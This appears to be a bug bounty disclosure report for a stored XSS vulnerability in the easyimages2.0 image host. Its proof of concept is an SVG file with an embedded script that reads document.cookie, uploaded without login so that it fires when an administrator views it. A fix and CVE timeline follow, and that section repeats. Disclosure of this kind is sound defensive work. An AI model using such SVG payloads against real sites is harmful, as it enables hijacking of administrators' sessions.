Storage xss vulnerability exists in simple graph beds in icret/easyimages2.0

Valid

Reported on

Mar 2nd 2023

Description

Storage xss vulnerability exists in simple graph beds,By constructing a malicious svg code that directs the administrator to click, the cookie is stolen

Proof of Concept

Make the svg file as follows

<? xml version="1.0" standalone="no"? >
<! DOCTYPE SVG PUBLIC "- / / / / W3C DTD SVG 1.1 / / EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >

< SVG version = "1.1" baseProfile = "full" XMLNS = "http://www.w3.org/2000/svg" >
<rect width="300" height="100" style="fill:rgb(0,0,255); stroke-width:3; stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

You can steal administrator cookies,No login required to upload svg files on the home page,Then the proof talks about administrator cookies,Set up a local environment and log in as an administrator Upload the svg xss payload we constructed to the graph bed system If yes, xss cookie theft will be triggered Successfully get cookie

Impact

Steal or tamper with application cookies for session hijacking

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. 20 days ago

We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back 19 days ago

NCNIPC梅苑 modified the report

19 days ago

icret validated this vulnerability 19 days ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

NCNIPC梅苑 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

NCNIPC梅苑

commented 18 days ago

Researcher

This bug has been fixed in the new version https://github.com/icret/EasyImages2.0/commit/3434282bbb342966d9dfe256108f9f1d0eb97d34 can I apply a CVE number

NCNIPC梅苑

commented 18 days ago

Researcher

@admin

icret marked this as fixed in 2.6.7 with commit 95a6ca 17 days ago

icret has been awarded the fix bounty

This vulnerability has been assigned a CVE

icret published this vulnerability 17 days ago

to join this conversation

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. 20 days ago

We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back 19 days ago

NCNIPC梅苑 modified the report

19 days ago

icret validated this vulnerability 19 days ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

NCNIPC梅苑 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

NCNIPC梅苑

commented 18 days ago

Researcher

This bug has been fixed in the new version https://github.com/icret/EasyImages2.0/commit/3434282bbb342966d9dfe256108f9f1d0eb97d34 can I apply a CVE number

NCNIPC梅苑

commented 18 days ago

Researcher

@admin

icret marked this as fixed in 2.6.7 with commit 95a6ca 17 days ago

icret has been awarded the fix bounty

This vulnerability has been assigned a CVE

icret published this vulnerability 17 days ago

to join this conversation